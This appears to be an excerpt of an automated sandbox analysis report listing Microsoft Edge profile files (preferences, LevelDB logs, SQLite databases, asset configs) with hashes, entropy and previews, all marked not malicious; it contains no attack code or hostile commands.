Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\887ea89d-8076-4c7a-8c90-f00cc221531c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8de669f9-7755-4fa5-873b-9d39ad9f5dc4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12350
Entropy (8bit):	5.204025927943763
Encrypted:	false
SSDEEP:	192:stQSLJ99QTryDigabatSuypAs8HyaNP9kT8k8mbV+FY+QAlePzYJ:stQSLPGKSu4As8HtJqbGNQ6
MD5:	A67A3AE5F5A0970175C41385A0E1E431
SHA1:	70AF73A9522635EEBE4B4E4BC71883688991942A
SHA-256:	0746DB5DE00FEEBA310E8D3916C5D184776603EE42A09F7F2DC5724D2AE24C4A
SHA-512:	617F8644C3ED08C97DC96DBF7A71D4CE9C91BBC4B53F25A4FF937F2DAA303428089C0FC93544E7A8674376ECACF47C69BACB44753F23B44E8DC3621D6D38E410
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.240081231196736
Encrypted:	false
SSDEEP:	6:HvmL1cNwi23oH+Tcwtp3hBtB2KLlVvmzi+q2PcNwi23oH+Tcwtp3hBWsIFUv:WZYebp3dFL0i+vLZYebp3eFUv
MD5:	D2BA59774340D8A3088CE4C54DF146A4
SHA1:	E8855393F4D1E27C4A25FC76DACA0E661BC9F201
SHA-256:	AE0C7CEB0998D36A13E303E50F43466CDAFCEB0613265A2A2859979DAFBDC113
SHA-512:	961D4924BCC752EC8C01056875EC6C183F6343F35E58CF7287C87AB3D9D5B45EA2A86970B6C712F218D50255416845B52138EE965E37B1161BD26952D680652F
Malicious:	false
Preview:	2024/11/02-14:52:04.684 1f4c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/02-14:52:04.696 1f4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	1696115
Entropy (8bit):	5.040638638921889
Encrypted:	false
SSDEEP:	24576:k4f76gGkISshcFdmcOAoPENUpifYP+MbI2T:k4fgAmmE
MD5:	FC1119B9FED68B9F5056C197813F5923
SHA1:	D9020BA1285DAA41A8023B0FD39F0609C675A591
SHA-256:	438D6C046479B2F92137E59F710826F39C2A2530B398BB6DB798DA0186837E1E
SHA-512:	E5B5D8C6DFE72276CE1AFFE417ADE546A27577F632EC42E5EB3109F811A56EFCF1AE5DAE09178694705B13A38BF7C16C3C4BAC79D4EC5303C842B92D8F703CEF
Malicious:	false
Preview:	...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4...13340965219355520.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.115011374546189
Encrypted:	false
SSDEEP:	6:HvmMq2PcNwi23oH+Tcwt9Eh1tIFUt8YvmqZmw+YvmQFkwOcNwi23oH+Tcwt9Eh1H:ZvLZYeb9Eh16FUt8E/+mF54ZYeb9Eh1H
MD5:	AFF4AC8BA19A64D905069F897EF40150
SHA1:	503EADC4FCA8BECD214EB20ED4CBC71BFE704594
SHA-256:	26478FA48F6E42C833852BF0B5BA2BEBF44CC5DD212CC9FA57F3F20D5869BFA5
SHA-512:	83119DC28DB1937712591DCD50FF3F7008FF7B0295EFA827C6F5CD6820ADF6DE17A35533E37FE8FB706F1B91EE0D4F5E54F0A5E61D825A5726DAD039A55A1BD9
Malicious:	false
Preview:	2024/11/02-14:52:04.788 20e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/02-14:52:04.819 20e4 Recovering log #3.2024/11/02-14:52:04.826 20e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.115011374546189
Encrypted:	false
SSDEEP:	6:HvmMq2PcNwi23oH+Tcwt9Eh1tIFUt8YvmqZmw+YvmQFkwOcNwi23oH+Tcwt9Eh1H:ZvLZYeb9Eh16FUt8E/+mF54ZYeb9Eh1H
MD5:	AFF4AC8BA19A64D905069F897EF40150
SHA1:	503EADC4FCA8BECD214EB20ED4CBC71BFE704594
SHA-256:	26478FA48F6E42C833852BF0B5BA2BEBF44CC5DD212CC9FA57F3F20D5869BFA5
SHA-512:	83119DC28DB1937712591DCD50FF3F7008FF7B0295EFA827C6F5CD6820ADF6DE17A35533E37FE8FB706F1B91EE0D4F5E54F0A5E61D825A5726DAD039A55A1BD9
Malicious:	false
Preview:	2024/11/02-14:52:04.788 20e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/02-14:52:04.819 20e4 Recovering log #3.2024/11/02-14:52:04.826 20e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4629430212211044
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuslT:TouQq3qh7z3bY2LNW9WMcUvBuslT
MD5:	A7F0FC7FCE39F707C8482181B64301D1
SHA1:	99439E3BE3CFFD4A4BAFE1AD8C15FDA61A93E0E0
SHA-256:	FD164FDBCFAEAC3271F292ED29D854C544E3CC7D679E69D7FF427D34CF1C8CB1
SHA-512:	741FFF4944684B42A4ECB39BD6ECA3C5301F5D391ADD9850E38B1568EDA67CF45391DE0C63F6843DCCE2025FB4609F0ECFABEBCABAEB12D67DECC75456651BEC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.2097520800185215
Encrypted:	false
SSDEEP:	6:HvCwQSVq2PcNwi23oH+TcwtnG2tMsIFUt8YvCwKTgZmw+YvCwKTIkwOcNwi23oHC:tBvLZYebn9GFUt8mt/+mf54ZYebn95J
MD5:	7A898DD03402F756A28B751F74979772
SHA1:	4E4641323C5E3DFC531A1D4AEAC836EF5BC24BC6
SHA-256:	FB47CC20394634CEE7FD8FDC24B60495A92786A890A4D8F90E594F6A4549E220
SHA-512:	09B2F7EDE984266C9C3BAE666CFC93D29DB0A6590EC43ADF1474E760582589426BF47ED4782ADF4A2644A5BEC4582CAC472B487D984D18BE3C8D671D40763A3B
Malicious:	false
Preview:	2024/11/02-14:51:58.435 1d50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/02-14:51:58.436 1d50 Recovering log #3.2024/11/02-14:51:58.436 1d50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.2097520800185215
Encrypted:	false
SSDEEP:	6:HvCwQSVq2PcNwi23oH+TcwtnG2tMsIFUt8YvCwKTgZmw+YvCwKTIkwOcNwi23oHC:tBvLZYebn9GFUt8mt/+mf54ZYebn95J
MD5:	7A898DD03402F756A28B751F74979772
SHA1:	4E4641323C5E3DFC531A1D4AEAC836EF5BC24BC6
SHA-256:	FB47CC20394634CEE7FD8FDC24B60495A92786A890A4D8F90E594F6A4549E220
SHA-512:	09B2F7EDE984266C9C3BAE666CFC93D29DB0A6590EC43ADF1474E760582589426BF47ED4782ADF4A2644A5BEC4582CAC472B487D984D18BE3C8D671D40763A3B
Malicious:	false
Preview:	2024/11/02-14:51:58.435 1d50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/02-14:51:58.436 1d50 Recovering log #3.2024/11/02-14:51:58.436 1d50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6138138616583683
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+j9BofEpuAmL:TO8D4jJ/6Up+x+x1
MD5:	7E63C3B5745A237473C36576D943AB67
SHA1:	8B66859B2B31A446506C597DD844D54D03DE6E3D
SHA-256:	B0B1B5D18171D15FE2F31196BDBDD08C8FD20DA3ED1998B14DD40105815463F4
SHA-512:	DAC71E65CE1C624DF47E3F8EE5902783461A838C7AFF11A63A6298462C40576EF3A0185D32E6C1B497B540FD218A71E3E53947546C1C5FDEABC254A36A5496C8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354171617295685
Encrypted:	false
SSDEEP:	6144:gA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:gFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	090FDD39A153F407B4F423BC91C4382E
SHA1:	2371FCBAFAF2DDB6BF125735E7063C0F1F90B80F
SHA-256:	327A6F8084EDB08D19E5484FE80DB98CFBE400611C93B5AE0C0F230C6A504721
SHA-512:	94A17CE60A63F482677E32948F29C593E872C7961A34117C48D19D5FEAA4274E93AF67A8067EEB492B9433B7327ED58126E4DD650BCEA65822EFEED57981EA92
Malicious:	false
Preview:	...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2...13375047127078452..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.1359220709794755
Encrypted:	false
SSDEEP:	6:Hvm+tG1cNwi23oH+Tcwtk2WwnvB2KLlVvm+XAq2PcNwi23oH+Tcwtk2WwnvIFUv:5tAZYebkxwnvFLzQvLZYebkxwnQFUv
MD5:	A7EF202DE1596B874B3B268A3AA16C54
SHA1:	7031454292E3B81B58B8020BA1E4235C1F2EFB38
SHA-256:	BDC61226A63CD8076AC6F985015A5B2C701CC053B2712BF4913F26D245C556FC
SHA-512:	996E5E1816AF60798CBF0BCA9675169C9874A87099C4989EBCA3CB8C89005EA015E210BA1892F5A1FBE3E7B872722999415FA7550C82666B63212F4E880D5F06
Malicious:	false
Preview:	2024/11/02-14:52:04.834 2120 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/02-14:52:04.880 2120 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324616634514124
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RY:C1gAg1zfvA
MD5:	805EF4E113D5C701B6B059CFB96A0881
SHA1:	7334A31B71A5C8FD788DC2FC31B5347F7DA60BD0
SHA-256:	24155CCA676C80552E48999B0665C0242F3BA1584D7CCDDD210FE96A8CF9029A
SHA-512:	0B144C3002B22E324F61A3C927D3714A49985960A787149629AF6FE8CA3BADA865869386BA6546F95A34CFBCB018699DED4A5C1A0904AFA7187079962B72A186
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.205109234365607
Encrypted:	false
SSDEEP:	6:HvCQUCL+q2PcNwi23oH+Tcwt8aPrqIFUt8YvCwToKWZmw+YvCwT+LVkwOcNwi230:1Um+vLZYebL3FUt8mEKW/+mWV54ZYebc
MD5:	CDD0E7C6948487BABB02E5A3F034492E
SHA1:	79BC0BB45A5788E90DDACFC636977CFDF0A177FC
SHA-256:	28BCB05767805062D82D367CE8AB942DCEDCE12242B33901B6B38564B77F0C77
SHA-512:	C28C2796E96DEEA3D8426F664E2DE9F8E546D5BC79B313FBA6A8FE847A88A7A7C99BA708F8B5B57708BDF80AC9950FA58239CCAF138D94653E50536E9F589BB5
Malicious:	false
